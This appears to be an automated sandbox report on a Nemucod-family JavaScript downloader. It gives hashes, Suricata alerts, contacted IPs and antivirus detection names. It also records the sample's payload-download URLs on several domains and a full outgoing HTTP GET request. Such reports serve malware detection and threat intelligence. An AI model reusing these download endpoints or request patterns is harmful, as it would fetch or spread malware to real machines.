Summary | ZeroBOX

I_139153.js

Category Machine Started Completed
FILE s1_win7_x6402 June 25, 2021, 1:27 p.m. June 25, 2021, 1:30 p.m.
Size 13.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 239a49edd5b5a6f189fa10dabe67ac70
SHA256 2a561027c5c1f4daadd16f84e1e268baa9c521373424a558ad4f3abf231ffa93
CRC32 7BB61029
ssdeep 384:rcy40n+gnmUxa2ZVpsw0zrGNDGT3FCmBG08KB2GtlKBeGtocvgH/rNcK1g3A+J64:rcyznxnmUxnVpsw0zrGNDGT3FHBG08Kg
Yara None matched

IP Address Status Action
103.26.41.24 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49805 -> 103.26.41.24:80 2016879 ET POLICY Unsupported/Fake Windows NT Version 5.0 Potential Corporate Privacy Violation
TCP 192.168.56.102:49805 -> 103.26.41.24:80 2024508 ET MALWARE Nemucod JS Downloader Aug 01 2017 A Network Trojan was detected

Suricata TLS

No Suricata TLS

request GET http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
host 172.217.25.14
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://schwellenwertdaten.de/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369356 0

InternetCrackUrlW

url: http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369356 0

InternetCrackUrlA

url: http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

InternetCrackUrlW

url: http://sherylbro.net/p66/873gfhi3f3r alexandradickman.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0010
http_version:
flags: 4194304
http_method: GET
referer:
path: /p66/873gfhi3f3r%20alexandradickman.com/873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369364 0

InternetCrackUrlW

url: http://?YhkGTDta=YhkGTDta
flags: 0
0 0

InternetCrackUrlW

url: http://?YhkGTDta=YhkGTDta
flags: 0
0 0

Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://schwellenwertdaten.de/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369356 0

InternetCrackUrlW

url: http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369356 0

send

buffer: !
socket: 788
sent: 1
1 1 0

send

buffer: GET /873gfhi3f3r??YhkGTDta=YhkGTDta HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept-Encoding: gzip, deflate Host: goliathstoneindustries.com Connection: Keep-Alive
socket: 976
sent: 236
1 236 0

send

buffer: !
socket: 788
sent: 1
1 1 0

InternetCrackUrlA

url: http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

InternetCrackUrlW

url: http://sherylbro.net/p66/873gfhi3f3r alexandradickman.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0010
http_version:
flags: 4194304
http_method: GET
referer:
path: /p66/873gfhi3f3r%20alexandradickman.com/873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369364 0

InternetCrackUrlW

url: http://?YhkGTDta=YhkGTDta
flags: 0
0 0

InternetCrackUrlW

url: http://?YhkGTDta=YhkGTDta
flags: 0
0 0

MicroWorld-eScan JS:Trojan.JS.Agent.QYD
CAT-QuickHeal Trojan.JS.Downloader.3345
ALYac JS:Trojan.JS.Agent.QYD
K7GW Trojan ( 005152191 )
K7AntiVirus Trojan ( 005152191 )
Arcabit JS:Trojan.JS.Agent.QYD
Baidu JS.Trojan-Downloader.Nemucod.yf
Cyren JS/Nemucod.CA2!Eldorado
Symantec JS.Downloader.D
ESET-NOD32 JS/TrojanDownloader.Nemucod.DSN
TrendMicro-HouseCall Mal_Cerber-JS03d
Avast Other:Malware-gen [Trj]
Kaspersky Trojan-Downloader.JS.Cryptoload.azt
BitDefender JS:Trojan.JS.Agent.QYD
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
AegisLab Troj.Downloader.Script!c
Tencent Js.Trojan-downloader.Cryptoload.Hqlu
Ad-Aware JS:Trojan.JS.Agent.QYD
Emsisoft JS:Trojan.JS.Agent.QYD (B)
Comodo TrojWare.JS.TrojanDownloader.Nemucod.DSH
F-Secure JS:Trojan.JS.Agent.QYD
DrWeb JS.DownLoader.4265
TrendMicro Mal_Cerber-JS03d
McAfee-GW-Edition BehavesLike.JS.ExploitPdfjsc.lm
Sophos Troj/JSDl-BL
F-Prot JS/Nemucod.CA2!Eldorado
Avira JS/Dldr.Agent.8067
Antiy-AVL Trojan[Downloader]/JS.Nemucod.dbp
Microsoft TrojanDownloader:JS/Nemucod!dta
AhnLab-V3 JS/Downloader
ZoneAlarm Trojan-Downloader.JS.Cryptoload.azt
GData JS:Trojan.JS.Agent.QYD
McAfee JS/Nemucod.oa
MAX malware (ai score=83)
Rising Trojan.JS/Nemucod!1.ACD4 (CLASSIC)
Ikarus Trojan-Ransom.Script.Locky
Fortinet JS/Nemucod.DSQ!tr.dldr
AVG Other:Malware-gen [Trj]
Qihoo-360 virus.js.qexvmc.1